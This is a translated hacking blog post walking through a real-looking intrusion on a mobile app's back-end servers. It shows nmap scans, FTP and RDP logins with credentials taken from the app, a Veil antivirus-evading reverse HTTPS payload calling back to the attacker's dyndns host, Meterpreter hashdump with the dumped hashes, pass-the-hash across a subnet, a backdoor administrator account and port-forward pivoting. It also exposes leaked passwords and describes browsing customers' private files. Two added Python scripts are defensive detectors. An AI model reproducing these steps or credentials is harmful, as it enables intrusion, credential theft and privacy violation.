Mobile Application Hacking Diary (Part 2)

11 February 2014, category: Network Security, author:

"Mobile Application Hacking Diary (Part 1)" was well received after its release, so here is the second part; we hope you enjoy it.


[0x03] – Server-Side Attacks

"In most cases, the client talks to one or more web servers, and attacking the server side of a mobile application is much like attacking an ordinary web site. Besides looking for web application vulnerabilities, you scan the target host to see which services it runs, then run a vulnerability scan against them to find potential weaknesses. Naturally, only do this with permission."

—— SANS Penetration Testing Blog


[0x03a] – Scanning

From the first part, we already have the back-end IP addresses found in the source code (203.60.240.180 and 203.60.240.183). Next we use Nmap to check how secure they are.

First we scan the target hosts with nmap (http://nmap.org) to see which ports are open.

Nmap scan results for 203.60.240.180:

—————————————————————

[zeq3ul@12:30:54]-[~]> nmap -sV -PN 203.60.240.180

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:31 ICT
Nmap scan report for 203.60.240.180
Host is up (0.0047s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 7.0
443/tcp  open  ssl/http Microsoft IIS httpd 7.0
3389/tcp open  ms-wbt-server?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds

—————————————————————


Nmap scan results for 203.60.240.183:

—————————————————————

[zeq3ul@12:35:12]-[~]> nmap -sV -PN 203.60.240.183

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:35 ICT
Nmap scan report for 203.60.240.183
Host is up (0.0036s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      Microsoft ftpd
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds

—————————————————————

From the scan results we know which ports are open: 203.60.240.180 runs IIS and Terminal Services, and 203.60.240.183 runs an FTP service. Time to harvest the fruit.


[0x03b] – Gaining Access

Since we already found a username and password in the source code ("msec1s", "S1lentM!@#$ec"), we can log in to the FTP service running on the server, as follows:

FTP Server: 203.60.240.183

—————————————————————

[zeq3ul@12:40:12]-[~]> ftp 203.60.240.183
Connected to 203.60.140.183
220 Microsoft FTP Service
User <203.60.140.183:<none>>: msec1s
331 Password required
Password:
230 User logged in.
ftp> pwd
257 "/" is current directory.
ftp>

—————————————————————

We are now logged in to the FTP server as "msec1s" and can reach every customer's contacts, photos, videos and so on. We hoped to find some "interesting" photos or video clips, but what we found was a DICK!!! WTF (look it up if you don't know)!! We stopped searching right there. Speechless...


Moving on to the next host, 203.60.240.180, we try to reach it through Terminal Services. Luckily, the same username and password we used for FTP ("msec1s", "S1lentM!@#$ec") work here as well (a cardinal sin: one account and password shared by several services). Excellent!

Connecting to the remote desktop with rdesktop:

—————————————————————

[zeq3ul@12:56:04]-[~]> rdesktop -u msec1s -p S1lentM!@#$ec 203.60.240.180

—————————————————————

What's more, the "msec1s" account has administrator privileges. Better and better!

[0x03c] – Bypassing Antivirus

Most antivirus products detect malware by signature. If the scanner finds a known malware signature, it quarantines or removes the file; if it finds no signature in the file, it treats the file as clean.

Veil, a payload generator written by Blackhat security expert Chris Truncer, does this job for us nicely.

Source download: https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus

For how to use Veil, see this site's own translated article "Veil – a payload generator for bypassing antivirus".


We build our payload from msfvenom shellcode, choosing Reverse HTTPS back to our web server (cwh.dyndns.org), as follows:

==================================================================
Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
==================================================================
[?] Use msfvenom or supply custom shellcode?
1 - msfvenom (default)
2 - Custom
[>] Please enter the number of your choice: 1
[?] What type of payload would you like?
1 - Reverse TCP
2 - Reverse HTTP
3 - Reverse HTTPS
0 - Main Menu
[>] Please enter the number of your choice: 3
[?] What's the Local Host IP Address: cwh.dyndns.org
[?] What's the LocalPort Number: 443
---------------------------------------------------------------

We now have payload.exe; as soon as a Windows system executes it, it tries to connect back to our server.

[0x03d] – Owning the System!!

Time to own the system! Since we can reach the target server (203.60.140.180) over Remote Desktop (port 3389) and the target host has network access, we can log in remotely, open our web server from the target, and execute our payload (payload.exe). The Metasploit payload (payload.exe) connects back (reverse_https) to the Meterpreter handler on our server (cwh.dyndns.org).

Next we run hashdump to grab the LM/NTLM hashes from the server, but this fails: on a 64-bit system, if Meterpreter is not itself running as a 64-bit process it refuses and reports a version mismatch (our Meterpreter is a 32-bit program). So we need to find a process to migrate into and run hashdump again from there. In this case we migrate into the (64-bit) Winlogon process.

The process is as follows:

—————————————————————

[zeq3ul@13:16:14]-[~]> sudo msfconsole
[sudo] password for zeq3ul:

Call trans opt: received. 2-19-98 13:18:48 REC:Loc
Trace program: running

http://metasploit.pro=[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1113 exploits - 701 auxiliary - 192 post
+ -- --=[ 300 payloads - 29 encoders - 8 nops

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST cwh.dyndns.org
LHOST => cwh.dyndns.org
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://cwh.dyndns.org:443/
msf exploit(handler) > [*] Starting the payload handler...
[*] 203.60.240.180:49160 Request received for /oOTJ...
[*] 203.60.240.180:49160 Staging connection for target /oOTJ received...
[*] Patched user-agent at offset 640488...
[*] Patched transport at offset 640148...
[*] Patched URL at offset 640216...
[*] Patched Expiration Timeout at offset 640748...
[*] Patched Communication Timeout at offset 640752...
[*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 203.60.240.180:49160) at 2013-06-07 13:25:17 +0700

sessions -l

Active sessions
===============

Id  Type                   Information                                Connection
--  ----                   -----------                                ----------
1   meterpreter x86/win32  WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13  cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-UUOFVQRLB13
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > ps -S winlogon
Filtering on process name...

Process List
============

PID  PPID  Name          Arch    Session  User                 Path
---  ----  ----          ----    -------  ----                 ----
384  340   winlogon.exe  x86_64  1        NT AUTHORITY\SYSTEM  C:\Windows\System32\winlogon.exe

meterpreter > migrate 384
[*] Migrating from 1096 to 384...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : WIN-UUOFVQRLB13
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY c6b1281c29c15b25cfa14495b66ea816...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
msec1s:1000:aad3b435b51404eeaad3b435b51404ee:73778dadcbb3fbd800e5bb383d5ec1e3:::

—————————————————————

We now have the hashes from the target machine. Hashes in hand, the privileges are ours, mwahaha~~

[0x03e] – Not Over Yet

Normally the next step would be to crack the hashes we obtained. Cracking Windows hashes can take a long time (well, actually Windows password hashes crack rather easily), so what if you would rather not spend the time and bypass the password check altogether?

A pass-the-hash attack may be a good answer. The simplest way to perform pass-the-hash is with Metasploit's built-in PSEXEC module (exploit/windows/smb/psexec), which executes a payload using whatever credentials you supply.

The module authenticates to the Windows SMB service with administrator credentials (once you hold an administrator's password or hash), creates a Windows service on the target, and uses that service as the stepping stone to run your payload with elevated privileges. Once you have the hashes from one Windows machine, this becomes your go-to penetration testing tool.

The well-known hacker Carlos Perez also wrote psexec_scanner, a batch-scanning version; interested readers can find it at the link below.

http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html
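From the defender's side, what makes the next step possible is a local Administrator whose NT hash is identical on several hosts. As an added example that is not part of the original paper, this Python script audits hashdump output in the pwdump format shown above for exactly that condition, plus blank passwords and LM hashes still being stored; the lines for 203.60.240.165 are constructed, assuming the same Administrator hash (the scan below shows that hash authenticating to .165).

```python
# Added example (not from the original paper): audit hashdump/pwdump output from
# several hosts for the conditions that let pass-the-hash move sideways.
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# 203.60.240.180: the lines dumped above. 203.60.240.165: constructed here,
# assuming the same local Administrator hash (the scan below shows that hash
# authenticating to .165 as well).
DUMPS = {
    "203.60.240.180": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
msec1s:1000:aad3b435b51404eeaad3b435b51404ee:73778dadcbb3fbd800e5bb383d5ec1e3:::""",
    "203.60.240.165": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::""",
}


def parse_pwdump(text):
    """Yield (user, rid, lm_hash, nt_hash) for each 'user:rid:lm:nt:::' line."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # blank or malformed line
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()


def audit(dumps):
    """Return sorted (where, user, finding) tuples: blank passwords, LM hashes
    still stored, and one NT hash valid on several hosts (the reuse that lets
    the dumped Administrator hash open 203.60.240.165 below)."""
    findings = []
    hosts_by_hash = defaultdict(set)
    for host, text in dumps.items():
        for user, _rid, lm, nt in parse_pwdump(text):
            if nt == EMPTY_NT:
                findings.append((host, user, "blank password"))
            if lm != EMPTY_LM:
                findings.append((host, user, "LM hash stored"))
            if nt != EMPTY_NT:
                hosts_by_hash[(user, nt)].add(host)
    for (user, _nt), hosts in hosts_by_hash.items():
        if len(hosts) > 1:
            findings.append((",".join(sorted(hosts)), user, "same NT hash on several hosts"))
    return sorted(findings)
```

Running `audit(DUMPS)` reports the shared Administrator hash across both hosts and the blank Guest password on each; distinct LAPS-style local passwords per host would make the first finding disappear.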

—————————————————————

meterpreter > background
[*] Backgrounding session 1…

msf exploit(handler) > use auxiliary/scanner/smb/psexec_scanner
msf auxiliary(psexec_scanner) > show options

Module options (auxiliary/scanner/smb/psexec_scanner):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   HANDLER    true                             no        Start an Exploit Multi Handler to receive the connection
   LHOST                                       yes       Local Hosts for payload to connect.
   LPORT                                       yes       LocalPort for payload to connect.
   OPTIONS                                     no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD    windows/meterpreter/reverse_tcp  yes       Payload to use against Windows host
   RHOSTS                                      yes       Range of hosts to scan.
   SHARE      ADMIN$                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                        yes       SMB Domain
   SMBPass                                     no        SMB Password
   SMBUser                                     no        SMB Username
   THREADS                                     yes       The number of concurrent threads
   TYPE       manual                           no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)

msf auxiliary(psexec_scanner) > set LHOST cwh.dyndns.org
LHOST => cwh.dyndns.org
msf auxiliary(psexec_scanner) > set LPORT 8443
LPORT => 8443
msf auxiliary(psexec_scanner) > set RHOSTS 203.60.240.0/24
RHOSTS => 203.60.240.0/24
msf auxiliary(psexec_scanner) > set SMBUser administrator
SMBUser => administrator
msf auxiliary(psexec_scanner) > set SMBPass aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
SMBPass => aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
msf auxiliary(psexec_scanner) > set THREADS 10
THREADS => 10
msf auxiliary(psexec_scanner) > exploit

[*] Using the username and password provided
[*] Starting exploit multi handler
[*] Started reverse handler on cwh.dyndns.org:8443
[*] Starting the payload handler...
[*] Scanned 031 of 256 hosts (012% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 077 of 256 hosts (030% complete)
[*] Scanned 111 of 256 hosts (043% complete)
[*] Scanned 129 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] 203.60.240.165:445 - TCP OPEN
[*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
[*] 203.60.240.180:445 - TCP OPEN
[*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
[*] Connecting to the server...
[*] Authenticating to 203.60.240.165:445|WORKGROUP as user 'administrator'...
[*] Connecting to the server...
[*] Authenticating to 203.60.240.180:445|WORKGROUP as user 'administrator'...
[*] Uploading payload...
[*] Uploading payload...
[*] Created ExigHylG.exe...
[*] Created xMhdkXDt.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[svcctl] ...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[svcctl] ...
[*] Obtaining a service manager handle...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ZHBMTKgE - "MgHtGamQQzIQxKDJsGWvcgiAStFttWMt")...
[*] Creating a new service (qJTBfPjT - "MhIpwSR")...
[*] Closing service handle...
[*] Closing service handle...
[*] Opening service...
[*] Opening service...
[*] Starting the service...
[*] Starting the service...
[*] Removing the service...
[*] Removing the service...
[*] Sending stage (751104 bytes) to 203.60.240.180
[*] Closing service handle...
[*] Closing service handle...
[*] Deleting xMhdkXDt.exe...
[*] Deleting ExigHylG.exe...
[*] Meterpreter session 2 opened (cwh.dyndns.org:8443 -> 203.60.240.180:49161) at 2013-07-02 13:40:42 +0700
[*] Sending stage (751104 bytes) to 203.60.240.165
[*] Meterpreter session 3 opened (cwh.dyndns.org:8443 -> 203.60.240.165:50181) at 2013-07-02 13:42:06 +0700
[*] Scanned 181 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(psexec_scanner) > sessions -l

Active sessions
===============

Id  Type                   Information                                Connection
--  ----                   -----------                                ----------
1   meterpreter x86/win32  WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13  cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-UUOFVQRLB13      cwh.dyndns.org:8443 -> 203.60.240.180:49161 (203.60.240.180)
3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-HDO6QC2QVIV      cwh.dyndns.org:8443 -> 203.60.240.165:50181 (203.60.240.165)

msf auxiliary(psexec_scanner) > sessions -i 3
[*] Starting interaction with 3…

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-HDO6QC2QVIV
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 2568 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>net user cwh 5plus4=10 /add
net user cwh 5plus4=10 /add
The command completed successfully.

C:\Windows\system32>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.

C:\Windows\system32>exit

—————————————————————
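The psexec_scanner output above shows the traces the module leaves on each target: a randomly named .exe uploaded through ADMIN$ into the Windows directory, and a randomly named service created, started and removed. As an added example that is not part of the original paper, this Python script scores Windows System-log "service installed" records (Event ID 7045) for those two artifacts; the event records and their field names are constructed here, modelled on the service and file names in the output above.

```python
# Added example (not from the original paper): flag Windows System-log "service
# installed" records (Event ID 7045) carrying the artifacts the psexec_scanner run
# above leaves: a random 8-letter service name and a random 8-letter .exe dropped
# into the Windows directory (uploaded through ADMIN$).
import re

# Constructed records modelled on the names in the output above; field names
# follow the 7045 event. Pairing of service and .exe is illustrative only.
EVENTS = [
    {"EventID": 7045, "ServiceName": "ZHBMTKgE", "ImagePath": "%SYSTEMROOT%\\xMhdkXDt.exe"},
    {"EventID": 7045, "ServiceName": "qJTBfPjT", "ImagePath": "%SYSTEMROOT%\\ExigHylG.exe"},
    {"EventID": 7045, "ServiceName": "BackupAgent",
     "ImagePath": '"C:\\Program Files\\Vendor\\agent.exe" -svc'},
    {"EventID": 7045, "ServiceName": "CryptSvc",
     "ImagePath": "%SystemRoot%\\system32\\svchost.exe -k NetworkService"},
]

EIGHT_LETTERS = re.compile(r"^[A-Za-z]{8}$")
# An 8-letter .exe directly in the Windows directory, not in a subfolder.
ROOT_EXE = re.compile(r"^(?:%SYSTEMROOT%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.I)

def case_changes(name):
    """Count upper/lower switches between adjacent letters ('qJTBfPjT' -> 5)."""
    return sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())

def looks_random(name):
    """Heuristic: 8 letters with at most 2 vowels or at least 4 case switches.
    'EventLog' (3 vowels, 3 switches) stays below both bars; 'CryptSvc' does not,
    which is why a hit also needs the path indicator."""
    if not EIGHT_LETTERS.match(name):
        return False
    vowels = sum(ch in "aeiouAEIOU" for ch in name)
    return vowels <= 2 or case_changes(name) >= 4

def score_event(ev):
    """Return the indicators present in one 7045 record (empty for other events)."""
    if ev.get("EventID") != 7045:
        return []
    reasons = []
    if looks_random(ev.get("ServiceName", "")):
        reasons.append("random-looking 8-letter service name")
    if ROOT_EXE.match(ev.get("ImagePath", "")):
        reasons.append("8-letter .exe directly in the Windows directory")
    return reasons

def suspicious_services(events):
    """Map ServiceName -> indicators for the records that show both of them."""
    hits = {}
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) == 2:
            hits[ev["ServiceName"]] = reasons
    return hits
```

Because the module deletes both the service and the binary within seconds, the 7045 record (and Security event 4697 where service auditing is enabled) is often the only durable trace, which is why the check works on log records rather than on the live service list.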

Now we need to deal with the next host (203.60.240.165).

Running "netstat -an" to list the ports the target has open, we see that 3389 is open, but we cannot log in to it directly because a firewall filters the port. We can get around that.

We use Meterpreter's "portfwd" command. Portfwd is a common pivoting technique that gives the attacking machine direct access to a port on the target: it opens another TCP connection through the existing session and relays the target port to a port opened locally on the attacker's side. You can use the following command to connect your attack host to the target host:

—————————————————————

meterpreter > portfwd add -l 3389 -r 127.0.0.1 -p 3389
[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389

—————————————————————

Finally, we connect to the target server (203.60.240.165) with the following rdesktop command:

—————————————————————

[zeq3ul@14:02:51]-[~]> rdesktop -u cwh -p 5plus4=10 localhost

—————————————————————

After grinding this long we finally got there. Feels great!!!

To recap, our attack ran from gathering information inside the mobile app at the start to escalating privileges at the end. The breakthrough was finding the account and password for the FTP server in the app's disassembled code, then guessing, with a little social engineering, the password of the other web server. For the escalation we followed Metasploit step by step; call it an advanced MSF exercise, and the latter half can be read as an advanced tutorial on escalating privileges with MSF.

Original article: http://www.exploit-db.com/papers/26620/


Translated by v2djia and 月巴_又鸟 of the Network Attack and Defense Lab (www.91ri.org) information security group; please credit the source when reposting.


